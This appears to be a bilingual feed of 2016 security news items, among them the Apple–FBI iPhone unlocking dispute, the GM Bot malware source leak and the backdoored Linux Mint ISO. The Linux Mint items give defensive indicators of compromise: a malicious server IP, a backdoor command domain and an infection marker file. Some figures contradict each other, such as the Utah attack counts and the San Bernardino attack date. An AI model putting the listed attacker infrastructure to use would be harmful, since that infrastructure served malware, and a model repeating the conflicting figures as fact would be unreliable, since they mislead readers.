Celé to došlo tak daleko, že federální soudce nařídil Applu vytvoření specifické verze iOSu, která by umožnila do telefonu se dostat. To vše jenom proto, že útočník ze San Bernardina si zamkl telefon pinem s pouhými čtyřmi číslicemi. A také, připomeňme, proto, že někdo chytře udělal reset hesla do iCloudu (což je jiné heslo).

Apple se odmítá soudnímu nařízení podřídit s tím, že by to narušilo důvěru zákazníků a bezpečnost Apple produktů. Což by, v tom všem zmatku, mohlo vypadat jako zbytečná obstrukce – ale nejspíš není. Především: Apple už předal FBI zálohy, které útočník v cloudu měl, takže zdaleka nejde o to, že by snad Apple nemínil spolupracovat (jediný háček je v tom, že jsou z října, tedy z období šesti týdnů před útokem, ke kterému došlo 2. prosince).

Ale to není zdaleka všechno. Jedním ze způsobů, jak získat z telefonu aktuální data, by bylo i to, že stačilo telefon připojit k WiFi síti, na které obvykle probíhaly zálohy – telefon by pak provedl aktuální zálohu, tedy za předpokladu, že by bývalo nedošlo ke změně/resetu hesla v iCloudu. Pro úplnost je vhodné dodat, že není známo, zda útočník zálohování před útokem nevypnul (coby bezpečnostní opatření).

Apple v otázce zjištění PINu (passcode, přesněji) použitého pro uzamčení telefonu pomoci nemůže, neukládá se nikde jinde než přímo v telefonu v šifrované podobě. Nemůže ale také pomoci ani v získání informací, které se do iCloudu nezálohují. Takových informací přitom v telefonu může být poměrně hodně. Zejména pokud útočník ze San Bernardina používal nějaké specifické aplikace.

Jeden konkrétní telefon

V celém tom nepřehledném zmatku se poměrně špatně orientuje. Ale zdravý rozum říká, že pokud je možné vytvořit specifický iOS, který po nahrání do zamčeného telefonu pomůže uzamčení prorazit, tak je vlastně nějaké zamykání dost zbytečné. FBI, stejně jako NSA a další organizace, měly v minulosti k dispozici řadu nástrojů, které jim umožňovaly hacknout (nejenom) iPhone.

Ale tady je důležitý další dílek skládačky: s příchodem iOS 8 tyhle pomůcky přestaly fungovat. Apple, který vsadil na bezpečnost zákazníků, provedl takové změny, které výrazně omezily to, co lze z telefonů dostat.

Aby to nebylo příliš jednoduché, doplňme, že kromě smartphonu, o který teď jde, používal útočník ještě vlastní telefon. iPhone, o který se teď vedou spory, je ve skutečnosti telefonem jeho zaměstnavatele. Vlastní telefon před útokem zničil. Stejně jako pevný disk z notebooku, který používal.

FBI se snaží argumentovat tím, že vlastně chce přístup jenom k jednomu konkrétnímu modelu (iPhone 5c) a tvrdí, že tedy vlastně vůbec o nic nejde. Jenže to, že teď jde o model 5c, neznamená, že příště nebude chtít přístup k iPhone 6.

Zadní vrátka

Nejzábavnější na tomto případu je to, že vlastně FBI nechce až tak moc zvláštní iOS. Vyšetřovatelé prostě chtějí pomoci, aby metodou postupného zkoušení mohli najít potřebnou čtyřčíselnou kombinaci.

Potřebují jen to, aby Apple deaktivoval vymazání telefonu po deseti špatně zadaných PIN kódech. Je dost zřejmé, že něco takového by Apple zcela určitě mohl udělat. Jenže, jak už bylo naznačeno, pak to znamená, že to může udělat kdykoliv a pro jakýkoliv telefon či tablet.

Navíc by se jim ještě hodilo to, kdyby Apple dokázal vypnout postupně se prodlužující interval mezi dalšími pokusy o zadání hesla, ale to je jistě také možné. Pokud by se bezpečnostní opatření nepodařilo vypnout, mohla by FBI hesla zkoušet v zásadě i několik let.

Apple logicky a správně zdůrazňuje, že takováto „verze“ iOSu neexistuje, protože pokud by existovala, tak by znamenala potenciální nebezpečí. Stačilo by, aby z firmy unikla.

Jak to celé dopadne?

Jaký výsledek bud mít právní bitva mezi Applem a FBI, zatím jasné není. Důležité je, že jakkoliv zde jde o zcela logický a „správný“ požadavek na zjištění informací z mobilu někoho, kdo zabíjel, není zde místo pro emoce.

Umožnit přístup do nějakého zařízení, kde se jeho vlastník rozhodl chránit vlastní data a informace, je zásadním narušením soukromí.

Apple (a nejenom Apple) v zásadě jde proti snaze vlád omezit dostupnost šifrování a zajistit si zadní vrátka pro libovolné potřeby. Celé tohle krátkozraké snažení ale nakonec stejně narazí na to, že pokud někdo bude chtít něco opravdu skrývat, bude to dělat tak, aby se všem zadním vrátkům vyhnul. A jediný, kdo pak snahy států o omezení soukromí odnese, jsou lidé, kteří nic špatného nedělají.


Source code of the Android GM Bot malware was leaked online
22.2.2016 Android

The experts at the IBM X-Force threat intelligence have discovered that the source code for Android malware GM Bot was leaked online.
Bad news for the Android community, the experts at IBM X-Force threat intelligence have discovered that the source code for Android malware GM Bot was leaked on an underground. The source code was leaked in December 2015, it include the bot component and the control panel.

It seems that one of GM Bot’s buyers decided to leak the code online to enhance credibility in the underground boards.

He leaked the code in an encrypted archive, then he indicated he would give the password only to active forum members who contacted him.

Of course, the code rapidly spread within the criminal ecosystem, it is now free and online is available a tutorial and the instructions for the server-side installation.

The availability online of the source code of a malware represents a crucial moment in the life cycle of malicious codes. Once the code is leaked online, cyber criminal organizations can work on it to create new variants that could be offered for sale or rent.

The original creator of the Android malware has sold the rights to distribute GM Bot v1 (aka MazarBot) to other cyber criminal organizations that is offering it for $500.

“According to X-Force threat intelligence, the code’s author moved on to working on a new version dubbed GM Bot v2.0, which is sold in financial fraud-themed underground boards.” states a blog post published by the X-Force threat intelligence.

GM Bot appeared in the wild in 2014, it was offered in the Russian underground as a powerful instrument for mobile phishing.

“This Android malware’s differentiating capability is its deployment of overlay screens on top of running banking applications, with the goal of tricking users into entering their access credentials into a fake window that will grab and forward them to a remote attacker.” continues the post.

The malware implements a number of features to target Android users, including intercepting SMS messages. The malware allows attackers to gain control of the targeted device, including the customization of fake screens.

In short, mobile banking Trojans such as GM Bot are a one-stop fraud shop for criminals:

They launch fake overlay windows that mimic bank applications to steal user credentials and payment card details.
They control the device’s SMS relay to eavesdrop, intercept and send out SMS messages.
They can forward phone calls to a remote attacker.
They have spyware features and can control the device via remote commands.
The experts at the IBM have analyzed only the control panel because many other organizations and security firms already produced a detailed analysis of malware.

The most interesting feature discovered by the experts in the GM Bot’s botnet administration panel is the possibility to create and deploy new injections to infected user devices.

Android malware GM Bot control panel

Another interesting component of the Botnet is the “Search and Stats” section that allows operators to analyze their database that includes stolen information, credit card details, lists of apps installed on infected devices, bank accounts the victims and other info.

Let me suggest to give a look to the interesting analysis published by IBM that also includes the indicators of compromise.


Anonymous took down several government websites of Saudi Arabia

22.2.2016  Hacking

Anonymous launched a series of cyber attacks against government websites of Saudi Arabia to protest the execution of 47 people, including Mr. Sheikh Nimr Al Nimr.
The Anonymous collective is conducting a hacking campaign against the Saudi Arabian Government to protest executions of 47 people.

On January 2nd, the Government announced the executions on terrorism charges, among the victims also Sheikh Nimr Al Nimr and a convicted al-Qaeda leader Faris al-Zahrani.

The executions raised the tension between Saudi Arabia and Iran, but the events also triggered the Anonymous response.

The attacks launched by Anonymous are executed as part of the operations #OpSaudi and #OpNimr.

The #OpNimr campaign was launched in September 2015 to protest continuous violations of human rights. Anonymous targeted Saudi websites is in response to the death sentence handed down to 17-year-old Mohammed al-Nimr.
Ali al-Nimr was sentenced to death on 27 May 2014, when he was only 17 years old, for taking part in demonstrations against the government, attacking the security forces, possessing a machine-gun and armed robbery.
The man is also accused of using a BlackBerry to encourage people to join the protest.

As explained by Amnesty International the Government has based its judgment on confessions extorted under torture. Members of Anonymous have started their campaign calling for Nimr’s release, the hacktivists added that he had been denied a lawyer and confirmed the tortures.

The series of cyber attacks that recently targeted the Saudi Arabian Government shut down the official website of the Ministry of Defense, the Royal Air Force, Saudi Ministry of Education and the Saudi Press Association, the Saudi Defense ministry website, the Saudi Customs Service, the Saudi Mistry of Finances, the Saudi Ombudsman’s Office and the General Passports Service.
Anonymous opSaudi Saudi arabia 2

Anonymous opSaudi Saudi arabia

The websites have been already restored.


Warning! — Linux Mint Website Hacked and ISOs replaced with Backdoored Operating System
21.2.2016 Hacking
Are you also the one who downloaded Linux Mint on February 20th? You may have been Infected!
Linux Mint is one of the best and popular Linux distros available today, but if you have downloaded and installed the operating system recently you might have done so using a malicious ISO image.
Here's why:
Last night, Some unknown hacker or group of hackers had managed to hack into the Linux Mint website and replaced the download links on the site that pointed to one of their servers offering a malicious ISO images for the Linux Mint 17.3 Cinnamon Edition.
"Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it," the head of Linux Mint project Clement Lefebvre said in a surprising announcement dated February 21, 2016.
Who are affected?
As far as the Linux Mint team knows, the issue only affects the one edition, and that is Linux Mint 17.3 Cinnamon edition.
The situation happened last night, so the issue only impacts people who downloaded the above-mentioned version of Linux Mint on February 20th.
However, if you have downloaded the Cinnamon edition or release before Saturday 20th, February, the issue does not affect you. Even if you downloaded a different edition including Mint 17.3 Cinnamon via Torrent or direct HTTP link, this does not affect you either.
What had Happened?
Hackers believed to have accessed the underlying server via the team's WordPress blog and then got shell access to www-data.
From there, the hackers manipulated the Linux Mint download page and pointed it to a malicious FTP (File Transfer Protocol) server hosted in Bulgaria (IP: 5.104.175.212), the investigative team discovered.
The infected Linux ISO images installed the complete OS with the Internet Relay Chat (IRC) backdoor Tsunami, giving the attackers access to the system via IRC servers.
Tsunami is a well-known Linux ELF trojan that is a simple IRC bot used for launching Distributed Denial of Service (DDoS) attacks.
Hackers vs. Linux Mint SysAdmins
However, the Linux Mint team managed to discover the hack, cleaned up the links from their website quickly, announced the data breach on their official blog, and then it appears that the hackers compromised its download page again.
Knowing that it has failed to eliminate the exact point of entry of hackers, the Linux Mint team took the entire linuxmint.com domain offline to prevent the ISO images from spreading to its users.
The Linux Mint official website is currently offline until the team investigates the issue entirely. However, the hackers' motive behind the hack is not clear yet.
"What we don't know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we’ll get in touch with authorities and security firms to confront the people behind this," Lefebvre added.
Hackers Selling Linux Mint Website's Database
The hackers are selling the Linux Mint full website's database for a just $85, which shows a sign of their lack of knowledge.
The hack seems to be a work of some script kiddies or an inexperienced group as they opted to infect a top-shelf Linux distro with a silly IRC bot that is considered to be outdated in early 2010. Instead, they would have used more dangerous malware like Banking Trojans.
Also, even after the hack was initially discovered, the hackers re-compromised the site, which again shows the hackers' lack of experience.
Here's How to Protect your Linux Machine
Users with the ISO image can check its signature in an effort to make sure it is valid.
To check for an infected download, you can compare the MD5 signature with the official versions, included in Lefebvre's blog post.
If found infected, users are advised to follow these steps:
Take the computer offline.
Backup all your personal data.
Reinstall the operating system (with a clean ISO) or format the partition.
Change passwords for sensitive websites and emails.
You can read full detail about the hack here. The official website is not accessible at the time of writing. We’ll update the story when we hear more.


Utah systems experiences 300k hacking attacks a day due to the presence of the NSA Data Center
21.2.2016 Hacking

The representatives of the Utah State confirmed that their systems experiences 300,000 hacking attacks a day due to the presence of the NSA Data Center.
The Utah state computer systems experience 300 million hacking attacks a day due to the presence of the NSA data center in the state.

The Utah Data Center, also known as the Intelligence Community Comprehensive National Cybersecurity Initiative Data Center, is the mammoth data storage facility built by the NSA to store data gathered by the US intelligence. The official mission of the center is classified, the plant is located at Camp Williams near Bluffdale, Utah.

NSA data center 's Utah Data Center in Bluffdale, Utah, Thursday, June 6, 2013. The government is secretly collecting the telephone records of millions of U.S. customers of Verizon under a top-secret court order, according to the chairwoman of the Senate Intelligence Committee. The Obama administration is defending the National Security Agency's need to collect such records, but critics are calling it a huge over-reach. (AP Photo/Rick Bowmer)

Edward Snowden revealed the project was initially known as the Massive Data Repository within NSA, but was renamed to Mission Data Repository.

NSA Utah Data Center Lightweight Security for Sparse Staff Unlike HQ Bloat
40°25’36.59″ N 111°55’57.92″ W pic.twitter.com/sdlLO0eJC5
— Cryptome (@Cryptomeorg) 20 Febbraio 2016

The presence of the data center is an element of attraction for the hackers as explained by the experts at the Utah Commissioner of Public Safety, that confirmed a significant increase in the number of cyber attacks over the years.

“In 2010, my IT director was letting me know that the number of attacks we were averaging a day were between 25,000 to 80,000,” said Keith Squires, Utah Commissioner of Public Safety. “We had peaks in the past year or so that were over 300,000,000 a day.”

Hackers use botnets to scan the state’s computer systems, searching for vulnerable systems.

“Although other states were seeing increases, most were not seeing anything like we were,” Squires said. “We didn’t realize it at first, but my opinion is in that same time, Utah was getting a lot of notoriety for the NSA facility that was being built here.”

The number of cyber attacks against computer systems of other US states has increased in the last years, but the trend observed for state of the Utah is singular.

“The dynamics of Utah have changed,” the State of Utah’s Information Security Director told KUTV.

The systems of the states belong to government entities and tech companies working in the intelligence and cyber security industries, for this reason hackers consider them a privileged target.

The journalists at 2News interviewed Neil Wyler, a former punk hacker, now a cyber security expert and consultant, asking him how hackers operate to compromise government entities.

Wyler explained that hackers can potentially target any system to find a way to penetrate US government system.

“To illustrate, he used a hypothetical example of a business that hackers could not penetrate, but they knew employees of the company liked to eat at a pizza place down the street. So the hackers infiltrated the pizza business website, spread pizza coupons at the firm that was their real target — encouraging workers to download a corrupted pizza “menu” — only to allow the hackers to troll the real target’s computers.” states Wyler.

Squires highlighted the strong security posture of critical infrastructure in the state, NSA facility such as the airport were designed to ensure a high-level of security with “totally separate” networks.

But let me add that security is an instantaneous concept, what is safe now at this time, it might not be in a few seconds.


Linux Mint was hacked, website served malicious ISO on Saturday
21.2.2016 Hacking

The Linux Mint website had been hacked, on Saturday, intruders were able to compromise it and serve malicious ISO of Linux Mint 17.3 Cinnamon edition.
The Linux Mint website had been hacked, on Saturday 20th, February, intruders were able to compromise the website serving malicious ISO of Linux Mint 17.3 Cinnamon edition.

The disconcerting announcement was made by Clement Lefebvre, the head of the Linux Mint project. Lefebvre explained that the webLinux Mint website had been compromised and that the hackers used it to distribute a malicious ISO of Linux Mint 17.3 Cinnamon edition.

“I’m sorry I have to come with bad news. We were exposed to an intrusion today. It was brief and it shouldn’t impact many people, but if it impacts you, it’s very important you read the information below. What happened?

Beware of hacked ISOs if you downloaded Linux Mint on February 20th! https://t.co/cexMF2USWS
— Linux Mint (@Linux_Mint) 21 Febbraio 2016

What happened?

Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it.” wrote Clement Lefebvre.

Users that downloaded the Linux Mint 17.3 Cinnamon edition prior to Saturday, or any other version/flavour (including Mint 17.3 Cinnamon via torrent or direct HTTP link), are not affected.

The operators behind the website of the Linux distribution have sanitized it.

Linux Mint Cinnamon Download and Overview

Lefebvre urges the users to check the MD5 digest of the downloaded ISOs in order to discover any modification to the legitimate software.

“If you still have the ISO file, check its MD5 signature with the command “md5sum yourfile.iso” (where yourfile.iso is the name of the ISO).” continues the post.

Below the list of valid signatures:

6e7f7e03500747c6c3bfece2c9c8394f linuxmint-17.3-cinnamon-32bit.iso
e71a2aad8b58605e906dbea444dc4983 linuxmint-17.3-cinnamon-64bit.iso
30fef1aa1134c5f3778c77c4417f7238 linuxmint-17.3-cinnamon-nocodecs-32bit.iso
3406350a87c201cdca0927b1bc7c2ccd linuxmint-17.3-cinnamon-nocodecs-64bit.iso
df38af96e99726bb0a1ef3e5cd47563d linuxmint-17.3-cinnamon-oem-64bit.iso
“If you still have the burnt DVD or USB stick, boot a computer or a virtual machine offline (turn off your router if in doubt) with it and let it load the live session.

Once in the live session, if there is a file in /var/lib/man.cy, then this is an infected ISO.”

If you have an infected ISO delete it, trash discs used to burn the ISO, and format USB sticks where the ISO was burnt.

If you have installed Linux Mint from an infected ISO follow these steps:

Take the computer offline.
Backup personal data.
Reinstall the OS (with a clean ISO) or format the partition.
And change passwords to sites you used – especially email accounts.
Who is behind the attack?

The hacked ISOs are hosted on a server with the IP 5.104.175.212 and the backdoor connects to the absentvodka.com domain.

The IP and the domain used in the attack lead to 3 people located in Sofia, Bulgaria. It is not clear the roles in the attack..

“What we don’t know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we’ll get in touch with authorities and security firms to confront the people behind this.” added Clement Lefebvre.


San Bernardino shooter’s Apple ID passcode changed in government custody
21.2.2016 Apple

While discussing the San Bernardino shooter’s iPhone, Apple executives said the password changed while it was under the government custody.
The discussion about the San Bernardino shooter’s iPhone has monopolized media in this week, a US magistrate ordered Apple to help unlock the mobile device, but the company refused to do so.

A new shocking news is circulating on the Internet, according to unnamed Apple executives, the shooter’s Apple ID password changed while it was under government custody causing the block of the access.

The password associated with the Apple ID linked to the San Bernardino shooter’s iPhone was changed less than 24 hours after the feds took possession of the mobile device.

This circumstance made impossible to access a backup of the information the government was seeking.

According to Buzzfeed, the company executives revealed that Apple had been helping federal officials with the investigation when the password change was discovered.

According to Apple, it had been helping the FBI with the investigation since early January 2016, but it seems that the law enforcement contacted the company after attempting to access the iPhone.

“The executives said the company had been in regular discussions with the government since early January, and that it proposed four different ways to recover the information the government is interested in without building a backdoor. One of those methods would have involved connecting the iPhone to a known Wi-Fi network and triggering an iCloud backup that might provide the FBI with information stored to the device between the October 19th and the date of the incident.” states Buzzfeed.

“Apple sent trusted engineers to try that method, the executives said, but they were unable to do it. It was then that they discovered that the Apple ID password associated with the iPhone had been changed. (The FBI claimed earlier Friday that this was done by someone at the San Bernardino Health Department.)”

Just after the dramatic event, an unnamed San Bernardino police official has executed a procedure to reset the Apple ID Passcode associated with Farook’s iPhone.

By default, resetting the Apple ID passcode creates a new device ID linked to the iCloud account that will not automatically sync device data online. The synchronization must be manually configured by the user after he generated the new Apple ID password.

In the case of the terrorist’s iPhone the change of the settings was not possible because already locked and feds were not able to force the sync with Cloud even if they take the device to the known Wi-Fi range.

Now the unique possibility to access the iPhone data consists in pushing an iOS software update that forces the auto-backup of the iPhone to a third party server.

The executives explained that creating a backdoor access to Apple iOS devices represents a serious risk for the privacy of millions of users. It could be used to virtually target any Apple device and open the door to massive surveillance.


Project Cumulus – Tracking fake phished credentials leaked to Dark Web
21.2.2016  Hacking

Project Cumulus – A group of experts at Bitglass used watermarks to track data through the Dark Web and discover how far do phished credentials get.
In April 2015, a group of experts at Bitglass used watermarks to track data through the Deep Web and discover how far does it get after a data breach. The experts discovered that the countries historically associated with cyber criminals activities such as Russia, China and Brazil, were the principal access points for the identity data.

Now the same group of experts published the results of a second research, dubbed Project Cumulus “Where’s Your Data”, aiming to track fake personal data across the Internet.

The researchers created a fake identity for employees of a ghostly retail bank, along with a functional web portal for the financial institution, and a Google Drive account. The experts also associated the identities with real credit-card data, then leaked “phished” Google Apps credentials to the Dark Web and tracked the activity on these accounts.

The results were intriguing, the leaked data were accessed in 30 countries across six continents in just two weeks.

Leaked data were viewed more than 1,000 times and downloaded 47 times, in just 24 hours the experts observed three Google Drive login attempts and five bank login attempts. Within 48 hours of the initial leak, files were downloaded, and the account was viewed hundreds of times over the course of a month, with many hackers successfully accessing the victim’s other online accounts.

“over 1400 hackers viewed the credentials” states the report. “1 in 10 hackers who viewed the credentials attempted to log into the bank web portal” “A torrent of activity resulted within hours of leaking the credentials,
with over 1400 visits from over 30 countries recorded between the Dark Web postings and the bank web portal.”

In 36 percent of the cases, hackers successfully accessed the victim’s other online accounts, 94 percent of hackers who accessed the Google Drive discovered the victim’s other online accounts and attempted to log into the bank’s web portal.

Project Cumulus - Dark Web where is your data

The Project Cumulus revealed that 68 percent of hackers accessed Google Drive and bank portal accounts from the Tor network in order to anonymize their identity online.

“One dark web community member encouraged novice hackers to use Tor in conjunction with a VPN service
purchased using cryptocurrency, warning that any missteps could lead to prosecution under the Computer Fraud and Misuse Act.” continues the report.

The researchers at Bitglass noticed that most of the visitors of the web portal that did not use the Tor network were from Russia (34.85%), United States (15.67%), China (3.5%), Japan (2%).

The Project Cumulus demonstrates the importance of adopting a proper security posture in protecting our data, it highlights the dangers of reusing login credentials and shows how quickly phished credentials can spread, exposing sensitive data.


Malicious spam campaign capitalizes the global interest in the Zika virus

20.2.2016 Spam

The cybercrime ecosystem is getting ready to exploit the media attention on the Zika virus infections for illegal activities. Be careful!
What is the relationship between the Zika virus and a malware? It’s just a matter of opportunity, the cyber crime ecosystem is getting ready to exploit the media attention on current issues for illegal activities. The Zika virus is a Public Health Emergency, as announced on February 1, 2016, by the World Health Organization (WHO). Zika seems to be responsible for birth defects, the population in the Americas were first victims of the virus.

Security experts at Symantec have spotted a malicious spam campaign seeking to exploit the interest in the event.

“Newsworthy events on a regional or global level often provide fertile ground for cybercriminals seeking to capitalize on the interest in these events. In this case, the Zika virus’ impact in countries like Brazil is being leveraged, while the potential impact in other countries make it a prime candidate for more malicious spam.” states a blog post published by Symantec.
Most cases of the Zika virus were reported in Brazil, the same country where cyber security experts have spotted the malicious spam campaign.

zika virus spam email

The campaign that targeted Brazilians relies on malicious spam email that present to be sent by the Saúde Curiosa (Curious Health), a Brazilian health web portal.

The messages used the following subject:

“ZIKA VIRUS! ISSO MESMO, MATANDO COM ÁGUA!” which translates to: “Zika Virus! That’s Right, killing it with water!”

The text of the message includes buttons and attachments displaying the message “Eliminating Mosquito! Click Here!” and “Instructions To Follow! Download!” as well as a file attachment.

The button redirect victims to the file hosting service Dropbox where experts discovered the same file attached to the spam emails (JS.Downloader) used by crooks to download additional malware onto the infected machine.

Symantec provided the following suggestion to limit the exposure to this specific hacking campaign:

For information about the Zika virus, visit the World Health Organization’s website
Always look for trusted news sources, regionally and globally, for additional information
Avoid clicking on links or opening attachments in unsolicited email messages
Run security software on your computer and ensure that it is up to date


FBI Screwed Up — Police Reset Shooter's Apple ID Passcode that leaves iPhone Data Unrecoverable
20.2.2016 Apple
Another Surprising Twist in the Apple-FBI Encryption Case: The Apple ID Passcode Changed while the San Bernardino Shooter's iPhone was in Government Custody.
Yes, the Federal Bureau of Investigation (FBI) has been screwed up and left with no option to retrieve data from iPhone that belonged to San Bernardino shooter Syed Farook.
Apple has finally responded to the Department of Justice (DoJ) court filing that attempts to force Apple to comply with an FBI request to help the feds unlock Farook's iPhone, but Apple refused to do so.
According to Apple, the company had been helping feds with the investigation since early January to provide a way to access Farook's iPhone, but the problem is that the feds approached the company after attempting a 'blunder' themselves.
Here's How the FBI Screwed itself
On October 19, 2015, Roughly six weeks before the San Bernardino terrorist attacks, Syed Farook made a last full iCloud backup of his iPhone 5C, which Apple had already provided to the FBI under a court order.
Now the FBI is looking for the data on Farook's phone stored between October 19, 2015, and the date of the attacks on December 12, which has not been yet synced with Farook's iCloud account.
When the FBI approached Apple to help them brute force the passcode without losing data, Apple suggested the feds an alternative way, i.e., Connect Farook's iPhone to the Internet by taking it to a known Wi-Fi range. This way his phone would have automatically backup device data with his iCloud Account.
But the Twist lies here:
Just after the terrorist attacks, an unnamed San Bernardino police official 'Reset the Apple ID Passcode' associated with Farook's iPhone 5C "less than 24 hours after the government took possession of the device" in an attempt to access the data.
Here's the blunder:
By default, resetting the Apple ID password essentially creates an entirely new device ID on an iCloud account that will not automatically sync device data online, until the user manually configures the newly generated Apple ID password within the device settings.
Unfortunately, Farook's iPhone is already LOCKED, and Apple has already refused to provide a backdoor to bypass the device passcode.
So, the authorities are now left with no chance to pull off the data from iCloud even if they take the device to the known Wi-Fi range.
Here's what a senior Apple executive who requested anonymity told BuzzFeed:
The Apple ID passcode linked to the iPhone belonging to one of the San Bernardino terrorists was changed less than 24 hours after the government took possession of the device, senior Apple executives said Friday. If that hadn't happened, Apple said, a backup of the information the government was seeking may have been accessible…
The executives said the company had been in regular discussions with the government since early January, and that it proposed four different ways to recover the information the government is interested in without building a back door. One of those methods would have involved connecting the phone to a known wifi network.
The statement came just hours after the DoJ criticized Apple's response to the court order.
Possible Alternative Ways to Recover Data
But, there could still be some way out to get the data the FBI needed. One way could be if it is possible for Apple to simply restore the changes made to Farook's iCloud account.
This way the feds could search for known WiFi and get the data automatically synced to the associated iCloud account, unless or until Farook had not turned OFF auto-backup purposely.
Another possible way to recover the data without unlocking the device could be forcefully pushing (if and only if it is possible to install an update without user interaction) an iOS software update to the target device with an additional inbuilt application that will simply auto-backup every file on the system to a third party server.


Donald Trump — Boycott Apple! But Still Tweeting from an iPhone
20.2.2016 Apple
As the groundwork for the presidential election is being cooked up in the United States to be held on 8 November 2016, candidates are very busy in sharpening their skills to gain the vote of reliance.
By struggling to gain an upper hand in the National issues at this moment could benefit the candidates bring them into the limelight and stardom.
Donald Trump (a Presidential Candidate from Republican Party) is not an exception to this.
Recently, Trump made a controversial statement to boycott Apple until the company handovers the San Bernardino terrorist's phone data to the authority; during a rally in South Carolina yesterday.
"First of all, Apple ought to give the security for that phone. What I think you ought to do is boycott Apple until they give that security number," Trump addressed in the rally.
This action was the outcome of the Apple denial to the request of Californian Judge to build a backdoor for the shooter's iPhone.
Also Read: FBI Screwed Up — Police Reset Shooter's Apple ID Passcode that leaves iPhone Data Unrecoverable.
Although many politicians have slammed Apple's decision, the company's stand is being backed up by many Big Fishes such as Google, Facebook, Twitter, Whatsapp.
Donald Trump: Boycott Apple
Though Donald Trump's reaction to the Apple's stand against the FBI sounds very aggressive via his tweet, the most interesting fact is that he tweeted the controversial tweet from his iPhone.
As Trump's tweet got an overwhelmed response in the Twitter community, the NSA Whistleblower Edward Snowden made an entry with a gripping statement that read, "can we boycott Trump instead."
Trump earlier called Snowden "Grandstander" and demanded his execution for leaking NSA's illegal activities indirectly, while appearing in a Channel Program called "Fox and Friends" in 2013.
Donald Trump Calls for Apple Boycott
Now, Snowden had his tit for tat through a tweet.
Also Read: Now We Know – Apple Can Unlock iPhones, Here's How to Hack-Proof your Device.
Trump Pledged Not to Use iPhone
Apart from his tweet that said to boycott Apple, Trump had pledged that he would not use his iPhone until Apple gives the data from the terrorist's locked phone to the FBI.
"I use both iPhone & Samsung. If Apple doesn't give info to authorities on the terrorists I'll only be using Samsung until they give info," Trump tweeted.
As Trump had made some headlines with interesting tweets to boost the election campaigns, let's wait whether other candidates are on the same roadway by ballooning the "Apple v/s FBI" issue bigger.


Apple řeší bricknuté iPhony. Vydá znovu aktualizaci 9.2.1

20.2.2016 Mobilní
Tajemný Error 53 přetvořil spoustu iPhonů v drahá těžítka. Firma se nyní omlouvá a k tomu přidává i řešení.

Apple znovu vydal iOS 9.2.1, aby pomocí něj opravil Error 53, který přetvořil v cihly všechny iPhony nové generace, jež v sobě měly součástky vyměněné uživatelem nebo neoficiální opravnou.

Nový iOS 9.2.1 bude k dispozici pouze těm, co si své iPhony aktualizují skrze iTunes na Macu nebo Windows PC. Většina vlastníků telefonu však provádí aktualizace skrze internetové připojení v mobilu, takže tuto verzi operačního systému nedostanou.

Error 53 se objevil na iPhonech 6, 6S, 6 Plus a 6S Plus, tedy nejnovější řadě. A to ve chvíli, kdy uživatel nebo opravna provedly výměnu tlačítka Home (které zahrnuje Touch ID, neboli autentikaci pomocí naskenování otisků prstů senzorem), kabelu, nebo v některých případech i displeje. Když se chyba objevila, telefon byl již zcela nepoužitený.

Zprávy o chybě vyvolaly pobouření mezi uživateli iPhonu a kritizoval ji mimo jiné Kyle Wiens, zakladatel serveru iFixit.com, který ji vidí jako hrozbu pro neoficiální opravy.

„Majitelé mají právo opravit si své produkty, nebo je svěřit technikům, jimž věří,“ řekl minulý týden Wiens v emailu Computerworldu.

Připadu se ujali také právníci. Před týdnem Seattleská právní agentura zažalovala Apple jménem pěti lidí.

Ve včerejším prohlášení se však firma omluvila za bricknutí iPhonů zákazníků.

„Apple dnes vydal aktualizaci softwaru, která umožní zákazníkům, jimž se zobrazila tato chybová zpráva [Error 53], úspěšně obnovit svůj přístroj pomocí iTunes na Mac nebo PC,“ potvrdil mluvčí Applu v emailu. „Omlouváme se za jakékoli nepříjemnosti.“

Pokud si zákazník mezitím koupil nový iPhone potom, co se dozvěděl, že mu jej společnost neopraví, bude odškodněn. Zařídí to služba AppleCare, kterou mají uživatelé kontaktovat.

Firma mezitím nenápadně pozměnila popis mechanismu za Errorem 53. Minulý týden Apple prohlásil, že „jde o výsledek bezpečnostních kontrol vytvořených na ochranu našich zákazníků. iOS zkontroluje, zda Touch ID senzor ve Vašem iPhonu či iPadu odpovídá ostatním komponentám v přístroji. Pokud iOS najde neshodu, kontrola selže a Touch ID je vyřazen z činnosti, a to včetně použití pro Apple Pay. Toto bezpečnostní opatření je nutné k ochraně Vašeho zařízení a k zabránění nechtěného použití podvodného Touch ID.“

Včera nicméně Apple poněkud pozměnil definici zmíněné kontroly, kdy sdělil že „byla vytvořena, aby zkontrolovala, zda Touch ID funguje správně, než opustí továrnu.“

I přes novou aktualizaci bude operační systém nadále hledat nesoulad v součástkách, prohlásila firma. Pokud iOS detekuje vyměněnou komponentu, deaktivuje Touch ID. Rozdíl? Z iPhonu samotného by se již neměla stát cihla.


Apple zareagoval na datem blokované iPhony: Problém existuje, počkejte si na aktualizaci
20.2.2016
Mobilní
Apple zareagoval na datem blokované iPhony: Problém existuje, počkejte si na aktualizaci
Trvalo to, ale Apple zareagoval na chybu, která při nastavení data na 1.1.1970 zablokuje iOS zařízení. Problému se velmi suše věnuje stránka podpory Apple Support, která uvádí pouze toto oznámení: Nastavení data na květen 1970 a dřívější může zapříčinit, že po restartu už iOS zařízení nenastartuje.

Problém tedy není pouze s datem 1. leden 1970, ale cokoliv od něj až do května. Slůvko „může“ si vykládejme tak, že starší 32bitové stroje touto chybou postižené nejsou, novější 64bitové ano (tedy ty s procesorem A7, A8, A8X, A9 a A9X). Ale pokud máte jeden z nových, tak je zablokování kritickým datem jisté.

Apple v druhé větě uvádí, že problém vyřeší následující aktualizace iOS. Už ale neuvádí, kdy se jí dočkáme.


Linux Foundation Launches 'Zephyr', a tiny OS for Internet of Things
20.2.2016 OS
zephyr-rtos-internet-of-things
The 21st century is witnessing a great change over in the daily life of folks with the advent of IoT devices that are capable of talking to each other without any human intervention.
Yeah! Now you do not have to individually cascade an instruction to each of your home devices to accomplish a task. All have gone automated with the actuators and sensors which are infused into the home appliances.
The fact is that your IoT devices would only comply within the family of same manufacturers. For example, if you have a Samsung smart refrigerator, and your wearable device is from Apple or any other vendors, then it couldn't sync as both are from different genres.
No need to worry now!
Zephyr: Future of IoTs
